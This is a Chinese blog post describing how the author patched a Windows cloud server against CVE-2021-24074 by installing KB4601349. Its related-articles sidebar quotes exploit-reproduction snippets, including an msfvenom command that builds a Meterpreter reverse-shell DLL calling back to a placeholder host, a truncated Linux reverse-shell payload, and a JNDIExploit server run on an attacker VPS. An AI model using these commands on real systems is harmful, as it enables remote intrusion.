云服务器CVE-2021-24074漏洞修复

最新推荐文章于 2024-05-07 10:36:53 发布
最新推荐文章于 2024-05-07 10:36:53 发布
阅读量1.8k 收藏
点赞数
分类专栏: 漏洞修复 文章标签: 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44281516/article/details/118550026
版权
本文讲述了作者收到腾讯云关于服务器存在CVE-2021-24074漏洞的警告后,如何及时登录微软更新网站下载并安装补丁KB4601349,通过创建快照保障安全,最后确认漏洞已被成功修复的过程。
摘要由CSDN通过智能技术生成

突然有一天腾讯云给我发了一个短信说我的服务器有漏洞,giao,这他喵的能忍?
在这里插入图片描述
马上连上服务器去修复漏洞
访问地址
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4601349
下载对应的补丁
我的服务器是
在这里插入图片描述
所以直接下载了
在这里插入图片描述
下载完毕,创建快照方便搞出问题后及时补救。
在这里插入图片描述
在这里插入图片描述
双击运行,重启电脑后运行systeminfo查看信息,已安装KB4601349
在这里插入图片描述
OK补丁打上再来扫描试试看看还有没有洞
在这里插入图片描述
在这里插入图片描述
漏洞已修复

LJ会发光
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GPO Schedule Task CMD Command(Solving CVE-2021-24074)
baobaoyu_的博客
02-22 307
GPO Schedule Task CMD Command open “Group Policy Management”->Domain Right click xxx.com to select “Create a GPO in this domain,and Link it here” ->Fill in a name such as test123->OK Edit the test123->User Configuration->Preferences->C
CVE-2022-33891漏洞原理、环境搭建和复现
qq_44767905的博客
07-25 8730
CVE-2022-33891漏洞原理、环境搭建和复现
Nacos 认证绕过漏洞CVE-2021-29441)复现
最新发布
weixin_43210943的博客
05-07 745
记一次内网Nacos漏洞复现
开源漏洞深度分析|CVE-2022-33891 Apache Spark 命令注入漏洞
LJQClqjc的博客
07-19 1241
棱镜七彩研究院威胁情报团队对CVE-2022-33891 Apache Spark 命令注入漏洞进行了深度分析。
CVE-2022-0847Linux内核提权漏洞
qq_49091880的博客
04-12 4515
步骤有点简略,各位师傅见谅
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041)是由于 OpenSSH 在处理会话资源时存在错误,攻击者可以利用该漏洞来 crash 或者控制 OpenSSH 服务器。该漏洞影响了 OpenSSH 服务器的稳定性和安全性。 二、影响 如果攻击...
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
**Laravel 框架中的 CVE-2021-3129 漏洞详解及 EXP 利用** Laravel 是一个流行的开源 PHP Web 应用框架,以其优雅的语法和强大的功能深受开发者喜爱。然而,就像任何其他软件一样,Laravel 也存在安全漏洞。其中之...
CVE-2021-21315-PoC:CVE 2021-21315 PoC
03-03
CVE-2021-21315系统信息这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的...
CVE-2021-26855
03-12
2021年,四个零日漏洞(也被统称为 Hafnium 攻击)被发现,其中 CVE-2021-26855 是最重要的一个,它涉及到 Exchange Server 上的一个服务器端请求伪造(SSRF)漏洞,可以通过 WebDAV 接口来触发。 **漏洞原理** ...
Linux pkexec高危漏洞 CVE-2021-4034修复
02-10
polkit rpm包 执行rpm -Uvh polkit-0.112-26.el7_9.1.x86_64.rpm 即可修复
CVE-2021-27928:CVE-2021-27928 MariaDBMySQL-'wsrep provider' 命令注入漏洞
04-16
信息 Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution Date: 03/18/2021 Exploit Author: Central InfoSec Version: MariaDB 10.2 before 10.2.37 10.3 before 10.3.28 10.4 before 10.4.18 10.5 before 10.5.9 Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL Tested on: Linux CVE : CVE-2021-27928 如何利用 步骤1:建立反向Shell有效负载 msfvenom -p linux/x64/shel
CVE-2021-40449 分析
qq_41252520的博客
03-24 1677
前言 该漏洞本身原理比较简单,而作为 Win10下的利用才是本篇文章的研究重点。 1.漏洞简介 1.1.漏洞描述 win32kfull.sys中的 NtGdiResetDC\textcolor{cornflowerblue}{NtGdiResetDC}NtGdiResetDC函数存在 UAF漏洞,攻击者可以利用该漏洞进行本地权限提升。 1.2.影响版本 windows_10 windows_10 20h2 windows_10 21h1 windows_10 1607 windows_10 1809 w
CVE-2020-1472复现与完整利用
热门推荐
Shanfenglan's blog
10-10 14万+
CATALOG漏洞原理利用1.修改文件impacket.dcerpc.v5.nrpc2.置空机器账户yukong$密码3.读取administrator密码4.下载目标的sam文件为下一步恢复机器密码做准备5.破解sam文件查看过去的机器密码6.重制密码yukong$机器密码7.查看密码是否恢复成功 漏洞原理 原理比较复杂,有兴趣的可以看看下面链接上的文章https://www.freebuf.com/articles/system/249860.html 利用 1.修改文件impacket.dcerpc.
CVE-2021-40444 复现
问题很多的小明
09-20 1552
利用过程:在Office文档中添加恶意ActiveX控件,以此来诱导目标用户打开恶意文档 复现环境:Ubuntu + WIN10 利用工具:Github:https://github.com/lockedbyte/CVE-2021-40444 0x01 生成恶意dll : msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll > shell.dll 需要提前下载lcab库 .
cve-2021-3156 POC漏洞利用方式以及修复办法
网站安全专家
01-28 1万+
临近2021春节年末,我们SINE安全监测中心发现Linux系统被爆出致命漏洞,导致大部分服务器受到黑客的攻击与入侵,该漏洞发生的根源是由于系统的管理命令。SUDO存在问题,导致普通用户无需输入root密码,可以直接使用sudo命令提权到root管理员权限,这漏洞是今年linux爆出的最大的漏洞,危害性极高,目前受漏洞影响的Linux版本是Linux Sudo1.8.2- 1.8.31p2 LinuxSudo1.9.0- 1.9.5 p1等版本,可以说是大多数的linux系统都有漏洞。目前我们已对SINE.
CVE-2021-1647:Microsoft Defender远程代码执行漏洞通告
爱国小白帽
01-14 3244
报告编号:B6-2021-011301 报告来源:360CERT 报告作者:360CERT 更新日期:2021-01-13 0x01漏洞简述 2021年01月13日,360CERT监测发现Microsoft发布了Microsoft Defender 缓冲区溢出漏洞的风险通告,该漏洞编号为CVE-2021-1647,漏洞等级:高危,漏洞评分:7.8。 攻击者通过构造特殊的PE文件,可造成Microsoft Defender 远程代码执行。 该漏洞目前有在野利用 对此,360CERT建议广大用户及时将Micr.
CVE-2020-2021:SAML身份验证机制绕过漏洞通告
爱国小白帽
06-30 3518
CVE-2020-2021:SAML身份验证机制绕过漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年06月30日, 360CERT监测发现Palo Alto官方发布了SAML身份验证机制绕过的风险通告,该漏洞编号为CVE-2020-2021漏洞等级:高危。 安全声明标记语言(SAML)是用于根据用户在另一上下文中的会话将其登录到当前应用程序中的标准。 SAML身份验证机制存在身份验证绕过的威胁。当SAML开启,同时Vali
CVE-2021-2109
weixin_43899495的博客
02-02 1229
漏洞检测 访问url:http://xxx.xxx.xxx/console/css/%252e%252e/consolejndi.portal 如果出现未授权访问则一般可以直接打了,由于这个漏洞的利用过程就需要目标服务器访问自己vps上的服务,所以只要能利用那目标肯定是要能出网的,那就是CS的战场了 漏洞复现 网上很多,我简单过一遍 在vps上开启服务: java -jar JNDIExploit-v1.11.jar -i [vps_ip] JNDIExploit-v1.11.jar文件见附件 修改一下ip
CVE-2021-45105/CVE-2021-44228
07-29
CVE-2021-45105和CVE-2021-44228是两个与Apache HTTP Server(Apache Web服务器)相关的漏洞编号。这些漏洞可能会影响Apache HTTP Server的安全性。CVE-2021-45105是一个路径遍历漏洞,攻击者可以利用它来读取服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值